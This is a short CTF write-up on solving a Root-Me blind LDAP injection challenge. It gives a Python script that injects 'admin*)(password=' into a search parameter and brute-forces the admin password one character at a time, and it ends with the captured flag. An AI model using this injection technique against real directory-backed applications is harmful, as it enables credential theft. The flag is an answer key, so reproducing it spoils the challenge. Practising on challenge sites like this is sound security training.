← Back
LDAP-injection-Blind | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.

View on GitHub

I took the code from here payloadAllTheThings blind LDAP injection.

This is our script, I changed the URL and the true condition.

import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
    print("[i] Looking for number " + str(i))
    for char in alphabet:
        r = requests.get("http://challenge01.root-me.org/web-serveur/ch26/?action=dir&search=admin*)(password=" + flag + char)
        if ("admin" in r.text):
            flag += char
            print("[+] Flag: " + flag)
            break

Here we can see the blind injection is working. It’s working because the developers added *, since we are using query that meant for search, and that’s how it works. We exploit this fact and add our malformed prefix, and by this way exfiltrate the password. achieve flag

And this is the FLAG we achieved via the script

FLAG

Flag: dsy365gdzerzo94